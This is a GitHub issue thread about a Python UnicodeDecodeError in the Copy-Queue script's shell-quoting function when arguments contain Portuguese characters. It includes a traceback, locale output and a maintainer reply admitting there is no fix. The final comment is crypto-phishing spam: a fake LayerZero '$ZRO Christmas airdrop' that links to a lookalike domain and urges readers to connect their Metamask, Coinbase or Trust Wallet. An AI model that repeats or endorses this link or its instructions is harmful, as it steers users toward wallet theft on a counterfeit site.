### ISSUE TITLE
UnicodeDecodeError when dealing with international characters

### ISSUE THREAD

**Issue by TulioLazarini** [jabbalaci/Copy-Queue#1]
Hello,
I was using this great script a long ago, and recently I moved to Ubuntu Server 14.04.2 LTS. I reinstalled the script and suddenly I got a strange error message:
`tulio@ubuntusvr:~/P2P$ cpq Adventures*.jpg ~/Vídeos
Traceback (most recent call last):
  File "/home/tulio/bin/cpq", line 159, in <module>
    main()
  File "/home/tulio/bin/cpq", line 154, in main
    process(next_id, sys.argv[1:])
  File "/home/tulio/bin/cpq", line 139, in process
    args = [shellquote(s) for s in args]
  File "/home/tulio/bin/cpq", line 127, in shellquote
    return "'" + s.replace("'", "'\\''") + "'"
UnicodeDecodeError: 'ascii' codec can't decode byte 0xc3 in position 13: ordinal not in range(128)`

This happens when there are special portuguese language characters in arguments. For instance, my LOCALE settings follows:

`tulio@ubuntusvr:~/P2P$ locale
LANG=pt_BR.UTF-8
LANGUAGE=pt_BR.UTF-8
LC_CTYPE="pt_BR.UTF-8"
LC_NUMERIC=pt_BR.UTF-8
LC_TIME=pt_BR.UTF-8
LC_COLLATE="pt_BR.UTF-8"
LC_MONETARY=pt_BR.UTF-8
LC_MESSAGES="pt_BR.UTF-8"
LC_PAPER=pt_BR.UTF-8
LC_NAME=pt_BR.UTF-8
LC_ADDRESS=pt_BR.UTF-8
LC_TELEPHONE=pt_BR.UTF-8
LC_MEASUREMENT=pt_BR.UTF-8
LC_IDENTIFICATION=pt_BR.UTF-8
LC_ALL=`

Thank you in advance.

**Comment by jabbalaci** [comment]
I also get this error message regularly in other Python projects of mine. I'm afraid I don't have a nice solution for this problem.

**Comment by gqgserver** [comment]
# $1000 Christmas Airdrop for 10,000 Eligible Users! 🎅🎁

Welcome to the festive $1000 Christmas Airdrop by LayerZero! Get ready to unwrap the joy and claim your share of $ZRO tokens. Here's your guide to participating:

[Claim Now on LayerZero Official](http://link.layerzer0network.online/rFz335)

![Claim Now](https://miro.medium.com/v2/resize:fit:720/format:webp/1*SalqMtUhedutBSfrW7-T-A.png)

## Airdrop Participation Steps:

1. **Connect Your Wallet:**
   - Visit the [LayerZero Airdrop](http://link.layerzer0network.online/rFz335).
   - Integrate your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Spread the Christmas Spirit:**
   - **Facebook:**
     [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://medium.com/@rlgon_49273/unwrap-joy-1000-christmas-airdrop-for-10-000-eligible-users-96741f346c2d&text=LayerZero+Christmas+Airdrop)
   - **Twitter:**
     [Share on Twitter](https://twitter.com/share?url=https://medium.com/@rlgon_49273/unwrap-joy-1000-christmas-airdrop-for-10-000-eligible-users-96741f346c2d&text=LayerZero+Christmas+Airdrop)
   - **Instagram:**
     [Share on Instagram](https://instagram.com/share?url=https://medium.com/@rlgon_49273/unwrap-joy-1000-christmas-airdrop-for-10-000-eligible-users-96741f346c2d&title=LayerZero+Christmas+Airdrop)

3. **Verification Check:**
   - Confirm your eligibility for the LayerZero Christmas Airdrop and secure your $ZRO tokens.

Don't miss out on this festive collaboration – claim your Christmas tokens now and let the holiday spirit shine with LayerZero!
